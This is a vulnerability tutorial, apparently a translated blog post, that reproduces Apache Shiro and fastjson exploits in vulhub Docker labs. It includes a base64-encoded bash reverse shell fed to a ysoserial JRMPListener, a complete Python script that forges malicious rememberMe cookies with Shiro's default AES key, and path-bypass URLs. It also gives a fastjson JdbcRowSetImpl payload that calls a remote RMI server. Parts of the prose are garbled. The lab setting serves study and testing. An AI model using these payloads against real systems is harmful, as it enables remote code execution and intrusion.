Title: Summary of practical vulnerabilities of shiro and fastjson

Shiro

Apache Shiro provides authentication, authorization, encryption and session management functions to hide complex problems and provide clear and intuitive APIs that enable developers to easily develop their own program security code.

Shiro focuses on what Shiro develops its development team calls the "four security cornerstones" - authentication, authorization, session management and encryption

Authentication: User identity identification. Sometimes it can be regarded as a "login", which is an act of the user to prove who he is. Authorization: Access control process, like determining "what" can access "what". Session Management: manages user sessions, even in an environment without WEB or EJB containers. Manage user time-related status. Cryptography: Use encryption algorithms to protect data more securely and prevent data from being peeped at. @shiro:https://github.com/vulhub/vulhub/tree/master/shiro

CVE-2010-3863: Apache Shiro certification bypass vulnerability

Vulnerability Principle

In versions before Apache Shiro 1.1.0, shiro did not standardize the URL before performing permission verification. Attackers can construct /, //, /./, /…/, etc. to bypass permission verification.

Affect Version

shiro 1.1.0 and JSecurity 0.9.x

Vulnerability Recurrence

The access page address is: IP:8080

Vulnerability Points/admin

Testing dictionary fuzz using cross directory

CVE-2016-4437: Apache Shiro 1.2.4 Deserialization Vulnerability/shiro550

Vulnerability Principle

It belongs to the shiro550 vulnerability.

In Apache Shiro 1.2.4 and previous versions, encrypted user information was serialized and stored in a cookie named remember-me. Attackers can use Shiro's default key to forge user cookies, trigger Java deserialization vulnerability, and then execute arbitrary commands on the target machine.

Shiro uses CookieRememberMeManager by default, encrypts the rememberMe cookies, and serializes the rememberMe field contents in the cookieRememberMeManaer class, AES encryption, and Base64 encoding operations. When identifying an identity, you need to decrypt the rememberMe field in the cookie. According to the encryption order, it can be inferred that the order of decryption is to obtain==cookie-base64 decoding-AES decryption-deserialization.==

Affect Version

Apache Shiro=1.2.4

Vulnerability Recurrence

Determine whether a page's login is used by the shiro framework for authentication, authorization, password and session management.

How to judge: After checking the Remember Password option, click Login, grab the packet, and observe whether there is a rememberme field in the request package, and whether there is a Set-cookie:rememberMe=deleteMe field in the response package. Similar to the picture below.

As long as the rememberMe=deleteMe field appears in the response package, it means there is a vulnerability. To put it in one-sidedly, if the rememberMe=deleteMe field appears, it should only indicate that the login page uses shiro for authentication, not directly indicating that there is a vulnerability and the recallMe field in the cookie of the request package, and the return package set-cookie does not have the deleteMe field. If the login fails, regardless of whether the RememberMe field is checked or not, the return package will have the rememberMe=deleteMe field. If the login is successful, the return package will have the rememberMe=deleteMe field. If the login is successful, the return package set-cookie has the rememberMe=deleteMe field. However, in all subsequent requests, the cookies will not have a RememberMe field check RememberMe. If the login is successful, the return package will have a RememberMe=deleteMe field in the set-Cookie, and there will be a RememberMe field. In all subsequent requests, the cookies will have a RememberMe field or you can add a RememberMe=1 after the cookie to see if there is any rememberMe=deleteMeYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE=

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}'

Use shiro-exploit.py to get the default key of shiro (Tool address: https://github.com/insightglacier/Shiro_exploit)

Use shiro.py to generate payload (you need to change the key yourself, the shiro.py code is as follows:)

Command: shiro.py 192.168.17.132:6666

shiro.py:

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def encode_rememberme(command):

popen=subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)

BS=AES.block_size

pad=lambda s: s + ((BS - len(s) %BS) * chr(BS - len(s) %BS)).encode()

key=base64.b64decode('kPH+bIxk5D2deZiIxcaaaA==')

iv=uuid.uuid4().bytes

encryptor=AES.new(key, AES.MODE_CBC, iv)

file_body=pad(popen.stdout.read())

base64_ciphertext=base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

if __name__=='__main__':

payload=encode_rememberme(sys.argv[1])

print ('rememberMe={0}'.format(payload.decode()))

python3 shiro.py 192.168.200.129:6666

After logging in, grab the packet and replace the cookie value in the data packet to rememberMe generated by shiro.py

CVE-2020-1957: Apache Shiro certification bypass vulnerability

Vulnerability Principle

We need to analyze the incoming delivery process of the URL we requested throughout the project. In the project that uses shiro, it is the URL we requested (URL1), which has been inspected by shiro permissions (URL2), and finally find the route to the springboot project to process (URL3)

The vulnerability occurs in URL1, URL2 and URL3. It may not be the same URL, which leads us to bypass shiro's verification and directly access the backend. The vulnerability in this case is caused by this reason.

Shiro framework controls user access rights through interceptor functions, such as anon, authc and other interceptors. anon is an anonymous interceptor and does not require login to access; authc is a login interceptor and needs to login to access.

Affect Version

Apache Shiro 1.5.2

Vulnerability Recurrence

Change the URL to /admin will automatically jump to the login login page

Construct malicious requests for permission bypass

Because the code level is added; it will be recognized as bypassed. Add one/short.

The URL is changed to /xxx/./admin/bypassed the login and the direct access is successful!

/xxx/./admin/

Shiro 721

Vulnerability recurrence: CVE-2019-12422

Environment: kali linux

Docker build and start

git clone https://github.com/3ndz/Shiro-721.git

cd Shiro-721/Docker

docker build -t shiro-721.

docker run -p 8080:8080 -d shiro-721

access:

If you log in with the correct account password, you will send two request packets, namely POST and GETPOST request packets, as shown in the figure below (the package obtained by logging in with the correct account password)

The GET request package is as follows (this is the package obtained by logging in with the correct password, mainly submitting cookie values to the background) Seeing a rememberMe=deleteMe field in the response package, it can be said that there is a shiro deserialization vulnerability

Burp plugin adds HaE and Logger++ to view shiro's fingerprint

Tool Utilization:

fastjson

@fastjson:https://github.com/vulhub/vulhub/tree/master/fastjson

Vulnerability Principle

The principle of this vulnerability lies in Fastjson's deserialization mechanism. When Fastjson parses JSON data, it tries to convert the JSON data to a Java object. In this process, Fastjson will determine how to parse the data based on the type information in the JSON data. Attackers can take advantage of this feature to construct specific data types and structures in JSON, so that Fastjson calls maliciously constructed Java classes or methods during parsing, thereby realizing remote code execution.

A common way of exploiting is to use Fastjson's autoType function. autoType is a feature of Fastjson that allows the use of fully qualified class name of the class when serializing and deserializing. An attacker can construct a malicious JSON data and use the malicious class as the value of autoType. When Fastjson deserializes, it will try to instantiate the specified class, thereby executing the code in the class (in the exploit process, JdbcRowSetlmpl is generally exploited to exploit the chain).

@type field

@type is one of the special fields in Fastjson that are used to process object type information. In JSON data, the @type field can be used to specify the type of the class that should be instantiated during deserialization. This field is usually used to specify the type information of the object during deserialization, especially when Fastjson's autoType function is enabled.

Through the @type field, Fastjson can identify the class to be instantiated and create objects based on the classpath provided in that field. This is very useful when serializing and deserializing complex object structures, as it allows you to specify the exact type of the object.

However, it is precisely because of the existence and use of the @type field that malicious users may use this field to construct malicious JSON data and specify the malicious classpath in the @type field. In this way, during the deserialization process, Fastjson will try to instantiate the corresponding class based on the classpath specified by the @type field, resulting in the possibility of malicious code being executed or security vulnerabilities being exploited.

JNDI

JNDI, RMI, and LDAP are technologies used in Java for different purposes.

JNDI (Java Naming and Directory Interface): JNDI is a set of APIs in Java that are used to access different naming and directory services. JNDI provides a unified access method that allows Java applications to connect and use a variety of different naming and directory services, such as DNS, LDAP, RMI registry, etc. The purpose of JNDI is to provide a unified access method, allowing Java applications to take advantage of the naming and directory functions of different services. RMI (Remote Method Invocation): RMI is a mechanism used in Java to implement remote method calls. It allows communication and method calls between objects between different Java virtual machines. In distributed systems, RMI allows remote systems to call each other's methods to achieve interaction between remote objects. LDAP (Lightweight Directory Access Protocol): LDAP is a protocol used to access distributed directory services. It is usually used to store structured data, such as user information, organizational structure, etc. In Java, JNDI provides support for LDAP access, allowing JNDI to connect and operate LDAP directory services, such as user authentication, retrieval of data, etc. The relationship between these technologies is that JNDI, as a Java API, provides a unified way to access different services, including LDAP. JNDI enables you to connect and operate an LDAP server, and retrieve and store data in an LDAP directory. In addition, JNDI can also be used to find remote objects in the RMI registry to implement remote method calls.

In summary, JNDI, as an API in Java, provides a unified way to access different services, allowing Java applications to connect and operate different naming and directory services such as LDAP and RMI registry.

JdbcRowSetImpl utilizes chain

In fastjson, we use JdbcRowSetImpl for deserialization attacks. The focus of JdbcRowSetImpl's utilization chain is how to call the autoCommit set method. The characteristic of fastjson deserialization is that it will automatically call the set method of the class, so there is a problem of deserialization. As long as the @type type is formulated, it will automatically call the corresponding class to parse.

This way we can construct our utilization chain. When the type of @type is JdbcRowSetImpl, the JdbcRowSetImpl class will be instantiated. So as long as the dataSourceName is passed to the lookup method, it can ensure that the remote attack server can be accessed, and then use the autoCommit property to trigger the lookup. The whole process is as follows:

The method of passing the attribute to the lookup by setting the dataSourceName - setting the autoCommit property, using the SetAutoCommit function to trigger the connect function - trigger the connect function The lookup function below will use the dataSourceName parameter just set, and you can access the remote server through RMI, thereby executing malicious instructions.

Exploit is as follows:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.17.39:9999/Exploit","autoCommit":true}

It is worth noting that: 1. The dataSourceName needs to be placed in front of autoCommit, because when deserialization is set, the attribute is set in order, and etDataSourceName first, and then setAutoCommit. 2. The url of rmi follows the name of our remote factory class to be retrieved, because the name under the path will be extracted in lookup() as the class to be retrieved.

fastjson detection version

1. Use dnslog to take it away. It is best to use your own dnslog because most of the dnslogs are written into the blacklist.

2. There is an error message, and the version number payload has not been read "{" and "," before entering the defective code block and throwing an exception

3. Use scripts to quickly detect version numbers, that is, each POC is called once, if there is, there is no, if there is no.

CVE-2017-18349 fastjson 1.2.24-rce

0x00 Introduction

fastjson is Alibaba's open source JSON parsing library. It can parse strings in JSON format, supports serializing Java Beans into JSON strings, or deserializing from JSON strings to JavaBeans. That is, the main function of fastjson is to serialize Java Beans into JSON strings, so that after obtaining the string, it can be persisted through databases, etc.

0x01 Vulnerability Overview

In the process of parsing json, fastjson supports the use of autoType to instantiate a specific class and call the set/get method of the class to access the attributes. By finding relevant methods in the code, some malicious exploit chains can be constructed.

0x02 Affect Version

Scope of impact: fastjson=1.2.24

0x03 Environment construction

cd /vulhub/fastjson/1.2.24-rce

docker-compose up -d

docker ps

Docker opens port 8090, accesses the target machine IP

http://192.168.200.166:8090/

JDK version switching

Vulnerability exploit requires jdk8, and the jdk that comes with kali is jdk11 cannot be used here, so uninstall kali's jdk1123 first

dpkg --list | grep -i jdk #View installed jdk packages

apt-get purge openjdk-* #Uninstall openjdk related packages

dpkg --list | grep -i jdk #Check that all jdk packages have been uninstalled

Download jdk1.8

https://github.com/frekele/oracle-java/releases/download/8u212-b10/jdk-8u212-linux-x64.tar.gz

Put the compressed package into kali and decompress and configure environment variables

mv jdk-8u212-linux-x64.tar.gz /opt/java #Place in /opt/ja